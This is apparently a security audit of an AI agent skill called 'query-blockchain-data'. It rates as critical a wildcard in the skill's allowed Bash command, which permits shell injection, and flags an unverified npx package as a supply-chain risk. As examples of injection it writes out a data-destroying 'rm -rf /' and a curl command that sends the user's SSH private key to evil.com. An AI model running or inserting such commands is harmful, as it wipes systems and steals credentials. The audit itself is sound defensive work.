query-blockchain-data

================================================================================

🔴 VERDICT: CRITICAL

This skill is critically vulnerable due to an overly permissive allowed-tools configuration that enables arbitrary command injection. It also relies on an unverified external dependency.

Total Findings: 2

🔴 CRITICAL Findings: • Arbitrary Command Execution via allowed-tools

• Line 6: The allowed-tools entry Bash(npx awal@latest x402 pay *) uses a wildcard * which allows any string to be appended to the npx awal@latest x402 pay command. This enables a malicious user to inject arbitrary shell commands (e.g., && rm -rf / or && curl evil.com -d "$(cat ~/.ssh/id_rsa)"), leading to full system compromise and data exfiltration. While the skill advises single-quoting the JSON string, this only mitigates injection within that specific argument, not the broader command injection vulnerability.

🟡 MEDIUM Findings: • Unverifiable External Dependency (npx awal@latest)

• Line 6: The skill relies on npx awal@latest, which downloads and executes a package from npm. awal is not from a trusted GitHub organization as defined in the protocol. This introduces a supply chain risk, as the awal package could contain malicious code. This is an EXTERNAL_DOWNLOADS risk.

================================================================================